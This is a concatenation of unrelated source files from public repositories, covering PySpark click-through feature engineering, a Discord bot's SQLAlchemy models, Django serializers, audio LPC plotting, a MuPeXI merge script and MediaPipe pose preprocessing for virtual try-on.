.otherwise(F.lit(\"C\"))))\n\n elif i[0] == '_37':\n\n max_ctr = tenK_click_df.agg({feature+\"_click\": \"max\"}).collect()[0][0]\n ctr_threshold1 = max_ctr/3\n ctr_threshold2 = 2*ctr_threshold1\n\n # if ctr == 0, value = A\n # if ctr > 0 and <= threshhold1, value = B\n # if ctr > threshhold1 and <= threshhold2, value = C\n # else value = D\n # Keep null values as it is\n\n tenK_click_df = tenK_click_df.withColumn(feature,\n F.when(tenK_click_df[feature+'_click'] == 0, F.lit(\"A\"))\n .otherwise(\n F.when(((tenK_click_df[feature+'_click'] > 0)\n & ((tenK_click_df[feature+'_click'] < ctr_threshold1) | (tenK_click_df[feature+'_click'] == ctr_threshold1)))\n , F.lit(\"B\"))\n .otherwise(\n F.when(((tenK_click_df[feature+'_click'] > ctr_threshold1)\n & ((tenK_click_df[feature+'_click'] < ctr_threshold2) | (tenK_click_df[feature+'_click'] == ctr_threshold2)))\n , F.lit(\"C\"))\n .otherwise(F.lit(\"D\")))))\n\n tenK_df5 = tenK_click_df.drop('_15_click','_16_click','_19_click','_22_click','_25_click','_27_click',\n '_28_click','_29_click', '_31_click', '_32_click', '_37_click', '_38_click'\n ,'_20_click','_23_click','_31_click', '_37_click')\n\n tenK_df5.cache()\n return tenK_df5\n\n# FeatureScore calculation using RandomForest Ensembling\n\ndef CalFeatureScore(tenK_df5):\n '''\n Takes input as a Spark DataFrame.\n Fit and transfor using Assembler Pipeline\n Run RandomForestClassifier to output top performing 30 features\n '''\n\n def ExtractFeatureImp(featureImp, dataset, featuresCol):\n '''\n Function to display featureImportances in human readable format\n '''\n list_extract = []\n for i in dataset.schema[featuresCol].metadata[\"ml_attr\"][\"attrs\"]:\n list_extract = list_extract + dataset.schema[featuresCol].metadata[\"ml_attr\"][\"attrs\"][i]\n varlist = pd.DataFrame(list_extract)\n varlist['score'] = varlist['idx'].apply(lambda x: featureImp[x])\n return(varlist.sort_values('score', ascending = False))\n\n\n encoding_var = [i[0] for i in tenK_df5.dtypes if (i[1]=='string')]\n num_var = [i[0] for i in tenK_df5.dtypes if (i[1]!='string') & (i[0]!= '_1')]\n\n string_indexes = [StringIndexer(inputCol = c, outputCol = 'IDX_' + c, handleInvalid = 'keep')\n for c in encoding_var]\n onehot_indexes = [OneHotEncoderEstimator(inputCols = ['IDX_' + c], outputCols = ['OHE_' + c])\n for c in encoding_var]\n label_indexes = StringIndexer(inputCol = '_1', outputCol = 'label', handleInvalid = 'keep')\n assembler = VectorAssembler(inputCols = num_var + ['OHE_' + c for c in encoding_var]\n , outputCol = \"features\")\n rf = RandomForestClassifier(labelCol=\"label\", featuresCol=\"features\", seed = 8464,\n numTrees=10, cacheNodeIds = True, subsamplingRate = 0.7)\n\n pipe = Pipeline(stages = string_indexes + onehot_indexes + [assembler, label_indexes, rf])\n\n ## fit into pipe\n\n mod = pipe.fit(tenK_df5)\n tenK_df6 = mod.transform(tenK_df5)\n\n varlist = ExtractFeatureImp(mod.stages[-1].featureImportances, tenK_df6, \"features\")\n top_features = [x for x in varlist['name'][0:30]]\n\n return top_features\n\n#Create data frame with one-hot encoding for categorical variables\n\ndef one_hot_encode(tenK_df5, top_features):\n '''\n Create data frame with one-hot encoding for categorical variables\n Take input as Spark Data Frame\n Output Spark DataFrame with hot-encoding\n '''\n\n one_hot = tenK_df5.toPandas()\n encoding_var = [i[0] for i in tenK_df5.dtypes if (i[1]=='string')]\n for col in encoding_var:\n one_hot_pd = pd.concat([one_hot,pd.get_dummies(one_hot[col], prefix='OHE_'+col,dummy_na=False)],axis=1).drop([col],axis=1)\n one_hot = one_hot_pd\n\n one_hot_df = sqlContext.createDataFrame(one_hot_pd)\n\n ###Keep the columns recommended by RandomForestClassifier\n\n curr_col = one_hot_df.columns\n col_to_drop = [x for x in curr_col if x not in top_features and x != '_1']\n\n tenK_df7 = one_hot_df\n for col in col_to_drop:\n tenK_df7 = tenK_df7.drop(col)\n\n return tenK_df7\n\n# use average imputer for null values\n\ndef imputeNumeric(numeric_DF):\n '''\n takes a spark df with continuous numeric columns\n outputs a spark df where all null values are replaced with the column average\n\n the first column, which is the outcome values, are preserved\n '''\n outputColumns=[\"{}\".format(c) for c in numeric_DF.columns[1:11]]\n catColumns = [\"{}\".format(c) for c in numeric_DF.columns[11:]]\n\n imputer = Imputer(\n inputCols=numeric_DF.columns[1:11],\n outputCols=[\"{}\".format(c) for c in numeric_DF.columns[1:11]]\n )\n\n model = imputer.fit(numeric_DF)\n\n imputedDF = model.transform(numeric_DF).select(['_1']+outputColumns+catColumns)\n\n return imputedDF\n\ndef scaleFeatures(inputedDF):\n '''\n inputs imputed data frame with no null values and continuous features\n transforms the data frame into 2 column data frame with first column as label and second column as dense vector of features\n scales all features using the StandardScalar\n returns 2 column dataframe with scaled features\n '''\n\n transformedImputedDF = inputedDF.rdd.map(lambda x: (x[0], Vectors.dense(x[1:11]))).toDF(['label', 'x'])\n\n\n scaler = StandardScaler(inputCol=\"x\",\n outputCol=\"features\",\n withStd=True, withMean=True)\n\n scalerModel = scaler.fit(transformedImputedDF)\n scaledDF = scalerModel.transform(transformedImputedDF).select(['label', 'features'])\n\n return scaledDF\n\n\n# parse raw 10k sample data to form tenKRDD\n#tenKRDD = sc.textFile(\"gs://w261-tktruong/eda.txt\").map(parse_raw_row).cache()\n\n#### Create SQL dataframe from RDD\nparsed_eda = edaRDD.map(parse_raw_row).cache()\n# for 10K sample data\ntenKfeature_df = sqlContext.createDataFrame(parsed_eda)\n\n# drop features with high unknown values\n\ntenK_df1 = tenKfeature_df.drop('_13','_36','_2','_11','_33','_34','_39','_40')\n\n#tenK_df1.show(1)\n\ntenK_df2 = tenK_df1.drop('_17','_18','_21','_24','_26','_30','_35')\n#tenK_df2.show(5)\n\n##Replace null with mean for numerical features\n\ntenK_df4 = imputeNumeric(tenK_df2)\ntenK_df4.cache()\n#tenK_df4.show(1,False)\n\n#### Customize binning for categorical features\n\ntenK_df5 = BinCategoricalFeatures(tenK_df4)\n#tenK_df5.show(20,False)\n\n### Call RandomForest Classifier to retrieve top performing features\ntop_features = CalFeatureScore(tenK_df5)\nprint(top_features)\n\n### Call one-hot encoding\n\ntenK_df7 = one_hot_encode(tenK_df5, top_features)\n#tenK_df7.show(5, False)\n\n### Build separate RDD for Categorical columns\n\ncatDF = tenK_df7.select([c for c in tenK_df7.columns if 'OHE' in c ])\ncatRDD = catDF.rdd\n#catRDD.take(5)\n\n### Build separate RDD for Categorical columns\n\n### Standardize numerical column and Build separate RDD for Numerical columns\n\nnumericDF = scaleFeatures(tenK_df7)\nnumRDD = numericDF.rdd\n#numRDD.take(5)\n\n### Combine both the RDD-s to build full data RDD\nFullDataRDD = numRDD.zip(catRDD)\n\nFullDataRDD1 = FullDataRDD.map(lambda x: (x[0][0], np.array(x[0][1]), np.array(x[1])))\\\n .map(lambda x: (x[0], np.append(x[1], x[2])))\n\nFullDataRDD2 = FullDataRDD1.map(lambda x: (x[0],Vectors.dense(x[1])))\n\nprint(FullDataRDD1.take(5))\n\nprint(FullDataRDD2.take(5))\n","repo_name":"debalina-m/CTR_Prediction_large_scale","sub_path":"development_files/Pre-proc-n-FeatureExtraction.py","file_name":"Pre-proc-n-FeatureExtraction.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24491962014","text":"from sqlalchemy import create_engine, Column, Integer, String, Text, Date, select, insert, update\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.sql.expression import func, select\n\nimport time\nimport datetime\n\nengine = create_engine('sqlite+pysqlite:///people.db')\nBase = declarative_base()\n\n# Setup tables\nclass People(Base):\n __tablename__ = 'people'\n id = Column(Text, primary_key=True)\n person_name = Column(Text)\n count = Column(Integer, default=0)\n\nclass Reminder(Base):\n __tablename__ = 'reminders'\n id = Column(Integer, primary_key=True, autoincrement=True)\n discord_id = Column(Integer)\n reminder_time = Column(Integer)\n status = Column(Text, default='pending')\n channel = Column(Integer)\n reminder_message = Column(Text)\n\nclass Bait(Base):\n __tablename__ = 'bait'\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column(String, default='Title')\n description = Column(String, default='Description')\n url = Column(String, default='https://cdn.discordapp.com/attachments/572464049179328532/572639933139779594/Shounen_Time.png')\n message = Column(String)\n\nclass Quote(Base):\n __tablename__ = 'quotes'\n id = Column(Integer, primary_key=True, autoincrement=True)\n quote = Column(Text, unique=True)\n author = Column(Text)\n guild_id = Column(Integer, default=None)\n created_at = Column(Date, default=func.now())\n\nclass Image(Base):\n __tablename__ = 'images'\n id = Column(Integer, primary_key=True, autoincrement=True)\n url = Column(String, unique=True)\n guild_id = Column(Integer, default=None)\n created_at = Column(Date, default=func.now())\n\n\nBase.metadata.create_all(bind=engine)\nSession = sessionmaker(bind = engine)\nsession = Session()\n\n### People ###\ndef people_top():\n stmt = select(People.person_name, People.count).order_by(People.count.desc())\n results = list(session.execute(stmt).all())\n output = ''\n for rank, row in enumerate(results):\n row_string = f'{rank+1}. **{row[0]}** - {row[1]}\\n'\n output = output + row_string\n return output\n\n\ndef people_increment(author):\n user_id = author.id\n user_name = author.name + '#' + author.discriminator\n _people_increment(user_id, user_name)\n\n\ndef _people_increment(user_id, name):\n person = session.query(People).filter(People.id == user_id).first()\n if (person):\n person.count += 1\n else:\n session.add(People(id=user_id, person_name=name, count=1))\n session.commit()\n\n### Reminders ###\ndef insert_reminder(user_id, reminder_time, channel_id, reminder_message):\n session.add(Reminder(\n discord_id=user_id, \n reminder_time=reminder_time, \n channel=channel_id, \n reminder_message=reminder_message))\n session.commit()\n\n\ndef query_reminders():\n current_time = time.time()\n due_reminders = session.query(\n Reminder.discord_id, \n Reminder.channel, \n Reminder.reminder_message) \\\n .filter(Reminder.reminder_time <= current_time) \\\n .filter(Reminder.status == 'pending').all()\n\n session.query(Reminder).filter(Reminder.status == 'pending').filter(Reminder.reminder_time <= current_time).delete()\n session.commit()\n return due_reminders\n\n\ndef query_user_reminders(user_id):\n reminders = session.query(Reminder.reminder_time, Reminder.reminder_message) \\\n .filter(Reminder.discord_id == user_id).all()\n return reminders\n\n\ndef clear_user_reminders(user_id):\n session.query(Reminder).filter(Reminder.discord_id == user_id).delete()\n session.commit()\n\n\n### Bait ###\ndef get_random_bait():\n bait = session.query(\n Bait.title,\n Bait.description,\n Bait.url,\n Bait.message) \\\n .order_by(func.random()).first()\n print(bait)\n return bait\n\n\ndef add_bait(title, description, url, message):\n session.add(Bait(title=title, description=description, url=url, message=message))\n session.commit()\n return 'Bait added!'\n\ndef clear_bait():\n session.query(Bait).delete()\n session.commit()\n return 'Bait cleared!'\n\n\n### Quotes ###\ndef add_quote(quote, author, guild_id=None):\n quote_already_exists = session.query(Quote.id, Quote.quote, Quote.author, Quote.guild_id).filter(Quote.quote == quote).first()\n if quote_already_exists:\n return 'ERROR: Quote already exists! \\n' + str(quote_already_exists)\n if guild_id:\n session.add(Quote(quote=quote, author=author, guild_id=guild_id))\n else:\n session.add(Quote(quote=quote, author=author))\n session.commit()\n return 'quote added! \\n' + str(session.query(Quote.id, Quote.quote, Quote.author, Quote.guild_id).filter(Quote.quote == quote).first())\n\ndef get_quote(id=None, guild_id=None):\n if id: \n quote = session.query(Quote.quote, Quote.author) \\\n .filter((Quote.guild_id == None) | (Quote.guild_id == guild_id)) \\\n .filter(Quote.id == id).first()\n else:\n quote = session.query(Quote.quote, Quote.author) \\\n .order_by(func.random()).first()\n return quote\n\n\n### Images ###\ndef add_image(url, guild_id=None):\n img_already_exists = session.query(Image.id, Image.url, Image.guild_id).filter(Image.url == url).first()\n if img_already_exists:\n return 'ERROR: Image already exists! \\n' + str(img_already_exists)\n if guild_id:\n session.add(Image(url=url, guild_id=guild_id))\n else:\n session.add(Image(url=url))\n session.commit()\n return 'Image added! ' + str(session.query(Image.id, Image.url, Image.guild_id).filter(Image.url == url).first())\n\ndef get_image(id=None, guild_id=None):\n if id: \n url = session.query(Image.url) \\\n .filter((Image.guild_id == None) | (Image.guild_id == guild_id)) \\\n .filter(Image.id == id).first()\n else:\n url = session.query(Image.url) \\\n .filter((Image.guild_id == None) | (Image.guild_id == guild_id)) \\\n .order_by(func.random()).first()\n return url\n\ndef get_guild_image(guild_id):\n url = session.query(Image.url) \\\n .filter(Image.guild_id == guild_id) \\\n .order_by(func.random()).first()\n return url\n\n\ndef list_images(guild_id=None):\n return session.query(Image.id, Image.url, Image.guild_id).filter(Image.guild_id == guild_id).all()","repo_name":"michaeldchin/shounentime","sub_path":"botmain/dbsetup.py","file_name":"dbsetup.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17613137113","text":"from Products.ZenUtils.guid.interfaces import IGlobalIdentifier\nfrom Products.ZenUtils.guid.guid import GUIDManager\n\nfrom Products.ZenModel.NotificationSubscription import NotificationSubscriptionManager\n\nimport logging\nlog = logging.getLogger(\"zen.notificationdao\")\n\n\nclass NotificationDao(object):\n def __init__(self, dmd):\n self.dmd = dmd\n self.notification_manager = self.dmd.getDmdRoot(NotificationSubscriptionManager.root)\n self.guidManager = GUIDManager(dmd)\n\n def getNotifications(self):\n self.dmd._p_jar.sync()\n return self.notification_manager.getChildNodes()\n\n def getSignalNotifications(self, signal):\n \"\"\"\n Given a signal, find which notifications match this signal. In order to\n match, a notification must be active (enabled and if has maintenance\n windows, at least one must be active) and must be subscribed to the\n signal.\n\n @param signal: The signal for which to get subscribers.\n @type signal: protobuf zep.Signal\n \"\"\"\n active_matching_notifications = []\n for notification in self.getNotifications():\n if notification.isActive():\n if self.notificationSubscribesToSignal(notification, signal):\n active_matching_notifications.append(notification)\n log.debug('Found matching notification: %s', notification)\n else:\n log.debug('Notification \"%s\" does not subscribe to this signal.', notification)\n else:\n log.debug('Notification \"%s\" is not active.', notification)\n\n return active_matching_notifications\n\n def notificationSubscribesToSignal(self, notification, signal):\n \"\"\"\n Determine if the notification matches the specified signal.\n\n @param notification: The notification to check\n @type notification: NotificationSubscription\n @param signal: The signal to match.\n @type signal: zenoss.protocols.protbufs.zep_pb2.Signal\n\n @rtype boolean\n \"\"\"\n return signal.subscriber_uuid == IGlobalIdentifier(notification).getGUID()\n\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenEvents/NotificationDao.py","file_name":"NotificationDao.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"24195093546","text":"# CONSTANTS\nDAYS = (\"Saturday\", \"Sunday\", \"Monday\", \"Tuesday\",\n \"Wednesday\", \"Thusday\", \"Friday\")\n\nMONTH_NAMES = (\"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\n \"July\", \"August\", \"September\", \"October\", \"November\", \"December\")\n\nMONTH_CODES = (1, 4, 4, 0, 2, 5, 0, 3, 6, 1, 4, 6)\nYEAR_CODES = (6, 4, 2, 0)\n\n\n# DAY FINDER FUNCTION\ndef getDay(date, month, year):\n leapYear = 0\n maxDate = 31\n\n # We'll subtract by 1, when the leap year comes in the month of Jan and Feb\n if year % 4 == 0 and (month in [1, 2]):\n leapYear = -1\n\n # Correcting the date and month if it exceeds or preceeds the normal range\n if (date > maxDate): date = maxDate\n elif (date < 1): date = 1\n\n if (month > 12): month = 12\n elif (month < 1): month = 1\n\n\n '''\n If it is month of February (2) and the year is a leap year, then the\n Maximum Date in Feb = 29 else Maximum Date in Feb = 28\n \n In the elif part,\n For the month of April (4), June (6), September (9), November (11) have 30 days.\n Assigning maxDate = 30\n\n And the syntax,\n >>> month in [4, 6, 9, 11]\n\n The 'in' keyword checks, if the value on the left is inside the list of [4, 6, 7, 11]. It returns True or False.\n\n It is similar to the switch statement in other Programming languages like C, C++, JavaScript, etc... but lot easier syntax\n '''\n\n if month == 2:\n maxDate = 29 if year % 4 == 0 else 28\n elif month in [4, 6, 9, 11]:\n maxDate = 30\n\n \n # Getting the code number from the respective Codes of list\n monthCode = MONTH_CODES[month - 1]\n yearCode = YEAR_CODES[(year//100) % 4]\n\n # Based on the formula of finding the day in maths\n total = date + monthCode + year % 100 + \\\n yearCode + (year//4) % 100 + leapYear\n\n # Returning the name of the day\n return DAYS[total % 7]\n\n\nprint(getDay(10, 7, 2021))\nprint(getDay(25, 12, 2020))\nprint(getDay(1, 1, 2020))\nprint(getDay(1, 1, 2021))\n\n'''\nOUTPUT:\n Saturday\n Friday\n Wednesday\n Friday\n'''\n","repo_name":"HighSchoolCoders/Python","sub_path":"Day Finder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4597779180","text":"import datetime\n\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import serializers\n\nfrom lists.models import List, Item\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \n # add username custom field, to avoid already exists users erros.\n username = serializers.CharField()\n \n class Meta:\n model = User\n fields = ('username',)\n\n\nclass ItemSerializer(serializers.HyperlinkedModelSerializer):\n\n pk = serializers.IntegerField(read_only=True)\n\n # use serializer to users\n # required false to permited anonymous users?\n assigned_to = UserSerializer(required=False)\n created_by = UserSerializer(required=False) \n\n class Meta:\n model = Item\n fields = (\n 'url',\n 'pk',\n 'title',\n 'priority',\n 'assigned_to',\n 'created_by',\n 'completed',\n 'completed_date'\n )\n # explicity custom view_name and lookup_field\n extra_kwargs = {\n 'url': {'view_name': 'task_detail', 'lookup_field': 'pk'}\n }\n\n\nclass TodoListSerializer(serializers.HyperlinkedModelSerializer):\n\n pk = serializers.IntegerField(read_only=True)\n\n # use serializer to taks\n tasks = ItemSerializer(many=True)\n\n class Meta:\n model = List\n fields = ('url', 'pk', 'title', 'tasks')\n # explicity custom view_name and lookup_field\n extra_kwargs = {\n 'url': {'view_name': 'list_detail', 'lookup_field': 'pk'}\n }\n\n def create(self, validated_data):\n # get tasks on validated_data\n # and create todo_list with validade_data\n tasks_data = validated_data.pop('tasks')\n todo_list = List.objects.create(**validated_data)\n\n for t_data in tasks_data:\n # get assigned_to and created_by from t_data\n # than get or create user passing username\n assigned_data = t_data.pop('assigned_to')\n assigned_to, created = User.objects.get_or_create(username=assigned_data[\"username\"])\n created_data = t_data.pop('created_by')\n created_by, created = User.objects.get_or_create(username=created_data[\"username\"])\n # and now create Item (task)\n Item.objects.create(\n todo_list=todo_list,\n assigned_to=assigned_to,\n created_by=created_by,\n **t_data\n )\n\n return todo_list\n\n def update(self, instance, validated_data):\n # get taks from validated_data\n tasks_data = validated_data.pop('tasks')\n # mapping\n tasks_mapping = {item['pk']: item for item in tasks_data}\n\n # update the list instance\n instance.title = validated_data['title']\n instance.save()\n\n # creations and updates\n for task_id, data in tasks_mapping.items():\n # get assigned_to and created_by from data\n # than get or create user passing username\n assigned_data = data.pop('assigned_to')\n assigned_to, created = User.objects.get_or_create(username=assigned_data[\"username\"])\n created_data = data.pop('created_by')\n created_by, created = User.objects.get_or_create(username=created_data[\"username\"])\n # get or create an Item (task)\n task, created = Item.objects.get_or_create(id=task_id, todo_list=instance)\n # and make any changes or not, dont forgot save()\n task.priority = data.get('priority', task.priority)\n task.assigned_to = assigned_to\n task.created_by = created_by\n task.title = data.get('title', task.title)\n task.save()\n\n # Delete if necessary\n # for task_id, task in tasks_mapping.items():\n # if task_id not in instance.tasks.all():\n # task.delete()\n\n return instance","repo_name":"2bec/django-todo_46g","sub_path":"lists/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6785470166","text":"\n\nclass ModelUtils:\n\n @classmethod\n def get_children(cls, queryset, label_key, model):\n results = []\n for obj in queryset:\n result = {\n\t\t\t\t\"value\": obj.id,\n\t\t\t\t\"label\": getattr(obj, label_key),\n\t\t\t}\n if model.objects.filter(parent=obj):\n result[\"children\"] = cls.get_children(model.objects.filter(parent=obj), label_key, model)\n results.append(result)\n return results\n","repo_name":"wartemple/base-django","sub_path":"backend/common/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23564563051","text":"#T = input()\r\nmy_file=open('Test.txt','r')\r\n#List = []\r\n#for i in range (0,int(T)):\r\n #N = input()\r\n ##Del=Word.split()\r\n #List.append(N)\r\nList=my_file.readlines()\r\nmy_file.close()\r\n\r\nR=[]\r\ns=1\r\nfor i in List:\r\n if int(i)<10:\r\n R.append('Case'+' '+'#'+str(s)+':'+' '+i)\r\n #print('Case'+' '+'#'+str(s)+':'+' '+i)\r\n if int(i)>=10: #and int(i[0])!=1:\r\n Y=i\r\n Y=Y[1:len(i)+1]\r\n X=int(i)-int(Y)-1\r\n Word=X\r\n for j in range (int(i),X-1,-1):\r\n A=str(j)\r\n p=0\r\n for k in range(0,len(A)-1):\r\n if int(A[k])<=int(A[k+1]):\r\n p=p+1\r\n if p==len(A)-1:\r\n Word=A\r\n break\r\n R.append('Case'+' '+'#'+str(s)+':'+' '+Word)\r\n #print('Case'+' '+'#'+str(s)+':'+' '+Word)\r\n s=s+1\r\n\r\nmy_file=open('Result.txt','w')\r\n\r\nfor i in R:\r\n my_file.write(i+'\\n')\r\nmy_file.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/5436.py","file_name":"5436.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18879314609","text":"class NumArray(object):\n\n def __init__(self, nums):\n \"\"\"\n :type nums: List[int]\n \"\"\"\n\n self.list = []\n\n l = len(nums)\n\n sum = 0\n for i in range(0, l):\n sum += nums[i]\n self.list.append(sum)\n\n def sumRange(self, i, j):\n \"\"\"\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n if i == 0:\n return self.list[j]\n else:\n return self.list[j] - self.list[i - 1]\n\n# Your NumArray object will be instantiated and called as such:\n# obj = NumArray(nums)\n# param_1 = obj.sumRange(i,j)","repo_name":"zhishu520/leetcode","sub_path":"303. Range Sum Query - Immutable.py","file_name":"303. Range Sum Query - Immutable.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38210402486","text":"import librosa as lbr\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport IPython.display as ipd\r\nx , fs = lbr.load('a.wav')\r\nsample = 8000\r\na = lbr.lpc(x,12)\r\nx_padding = np.pad(a,(12,8000),'constant')\r\nprint(len(x_padding))\r\ny = np.abs(np.fft.fft(x,sample))\r\nlpc = np.fft.fft(x_padding,sample)\r\nlpc_rep = np.abs(np.reciprocal(lpc))\r\nhalf = fs/2\r\nplt.plot(np.arange(4000)/4000*half,np.log(np.abs(y[:4000])),label='signal')\r\nplt.plot(np.arange(4000)/4000*half,np.log(np.abs(lpc_rep[:4000])),label='lpc spectrum')\r\nplt.xlabel('Frequency')\r\nplt.ylabel('log magnitude')\r\nplt.legend()\r\nplt.show()","repo_name":"Maliniravi23/Malini","sub_path":"LinearPredictionAnalysis.py","file_name":"LinearPredictionAnalysis.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27113791963","text":"\nfrom enable.tools.api import ViewportPanTool\nfrom traits.api import HasTraits, Instance, Str, List, Property, Dict\n\nfrom mapping.enable.api import MappingCanvas, MappingViewport, MBTileManager\n\n\nclass Model(HasTraits):\n\n canvas = Instance(MappingCanvas)\n viewport = Instance(MappingViewport)\n\n filename = Str\n\n\ndef main():\n manager = MBTileManager(filename = 'map.mbtiles',\n min_level = 0,\n max_level = 3)\n\n canvas = MappingCanvas(tile_cache = manager)\n\n viewport = MappingViewport(component=canvas)\n viewport.tools.append(ViewportPanTool(viewport))\n\n model = Model(canvas=canvas, viewport=viewport)\n\n import enaml\n with enaml.imports():\n from simple_view import Map\n window = Map(model=model)\n window.show()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nmichaud/enable-mapping","sub_path":"example/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"72331174593","text":"import os\nimport argparse\n\nparser = argparse.ArgumentParser(description = 'merge mupexi data')\nparser.add_argument('base_dir', type = str, help = 'directory to look for mupexi files')\nparser.add_argument('prefix', type = str, help = 'prefix for output files')\nargs = parser.parse_args()\n\nall_data = []\nbase_string = ''\nmissense = 0\ninsertions = 0\ndeletions = 0\nframeshift = 0\n# get data from all files with a mupexi extension\nfor directory in sorted([f\"{args.base_dir}/{dir_to_check}\" for dir_to_check in os.listdir(args.base_dir)]):\n if os.path.isdir(directory):\n found = False\n mupexi_file = ''\n for filenm in sorted(os.listdir(directory)):\n if (filenm[len(filenm) - 6:len(filenm)] == 'mupexi') and (os.path.isfile(directory + '/' + filenm)):\n found = True\n mupexi_file = filenm\n base_string = filenm\n break\n if found:\n with open(directory + '/' + mupexi_file) as data:\n all_data.append(data.readlines())\n mupexi_log = mupexi_file[:-len(\".mupexi\")] + \".log\"\n if os.path.isfile(directory + '/' + mupexi_log):\n with open(directory + '/' + mupexi_log) as data:\n all_lines = data.readlines()\n for i, line in enumerate(all_lines):\n if \"missense\" in line:\n missense += int(line.split()[1])\n insertions += int(all_lines[i+1].split()[0])\n deletions += int(all_lines[i+2].split()[0])\n frameshift += int(all_lines[i+3].split()[0])\n break\n else:\n print('Did not find mupexi log file in {:}'.format(directory))\n else:\n print('Did not find mupexi file in {:}'.format(directory))\n\n# write data to one file\nwith open(f\"{args.base_dir}/{args.prefix}_merged.mupexi\", 'w') as data:\n for i, file_data in enumerate(all_data):\n if i == 0:\n data.write(''.join(file_data))\n else:\n # find the length of the header\n header_len = 0\n for line in file_data:\n if line[:len('HLA-')] == 'HLA-':\n break\n else:\n header_len += 1\n data.write(''.join(file_data[header_len:]))\n\nwith open(f\"{args.base_dir}/{args.prefix}_merged.log\", 'w') as data:\n data.write(\"missense {}\\n\".format(missense))\n data.write(\"insertions {}\\n\".format(insertions))\n data.write(\"deletions {}\\n\".format(deletions))\n data.write(\"frameshift {}\\n\".format(frameshift))\n","repo_name":"d-henness/bioinfo_workflows","sub_path":"scripts_dir/merge_mupexi_files.py","file_name":"merge_mupexi_files.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37455158023","text":"import json\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport mediapipe as mp\nimport os\n\n\n# running the preprocessing\n\ndef resize_img(path):\n im = Image.open(path)\n im = im.resize((768, 1024))\n im.save(path)\n\n\nfor path in os.listdir('/content/inputs/test/cloth/'):\n resize_img(f'/content/inputs/test/cloth/{path}')\n\nos.chdir('/content/virtual_clothes_try_on_assistant')\nos.system(\"rm -rf /content/inputs/test/cloth/.ipynb_checkpoints\")\nos.system(\"python cloth-mask.py\")\nos.chdir('/content')\nos.system(\n \"python3 /content/Self-Correction-Human-Parsing/simple_extractor.py --dataset 'lip' --model-restore '/content/Self-Correction-Human-Parsing/checkpoints/final.pth' --input-dir '/content/inputs/test/image' --output-dir '/content/inputs/test/image-parse'\")\nos.chdir('/content')\n\nmp_pose = mp.solutions.pose\npose = mp_pose.Pose(static_image_mode=True, min_detection_confidence=0.5)\ninput_image_dir = '/content/inputs/test/image/'\nmediapipe_json_dir = '/content/inputs/test/mediapipe_json/'\nmediapipe_img_dir = '/content/inputs/test/mediapipe_img/'\nopenpose_json_dir = '/content/inputs/test/openpose_json/'\nos.makedirs(openpose_json_dir, exist_ok=True)\nfor image_path in os.listdir(input_image_dir):\n image = cv2.imread(os.path.join(input_image_dir, image_path))\n image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = pose.process(image_rgb)\n keypoints = results.pose_landmarks\n openpose_data = {\n \"version\": 1.0,\n \"people\": []\n }\n if keypoints:\n person_data = {\n \"person_id\": 1,\n \"pose_keypoints_2d\": []\n }\n for landmark in keypoints.landmark:\n x = landmark.x\n y = landmark.y\n confidence = landmark.z # Use the z-coordinate as confidence\n person_data[\"pose_keypoints_2d\"].extend([x, y, confidence])\n openpose_data[\"people\"].append(person_data)\n json_filename = image_path.replace('.jpg', '.json')\n json_path = os.path.join(openpose_json_dir, json_filename)\n with open(json_path, 'w') as json_file:\n json.dump(openpose_data, json_file)\n annotated_image = image.copy()\n mp_drawing = mp.solutions.drawing_utils\n mp_drawing.draw_landmarks(annotated_image, keypoints, mp_pose.POSE_CONNECTIONS)\n img_path = os.path.join(mediapipe_img_dir, image_path.replace('.jpg', '_pose.jpg'))\n cv2.imwrite(img_path, annotated_image)\npose.close()\n\nfor image_path in os.listdir(input_image_dir):\n image = cv2.imread(os.path.join(input_image_dir, image_path))\n image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image_21_channels = np.zeros((image_rgb.shape[0], image_rgb.shape[1], 21))\n image_21_channels[:, :, :3] = image_rgb\n\nmodel_image = os.listdir('/content/inputs/test/image')\ncloth_image = os.listdir('/content/inputs/test/cloth')\n\npairs = zip(model_image, cloth_image)\n\nwith open('/content/inputs/test_pairs.txt', 'w') as file:\n for model, cloth in pairs:\n file.write(f\"{model} {cloth}\")\n\n# making 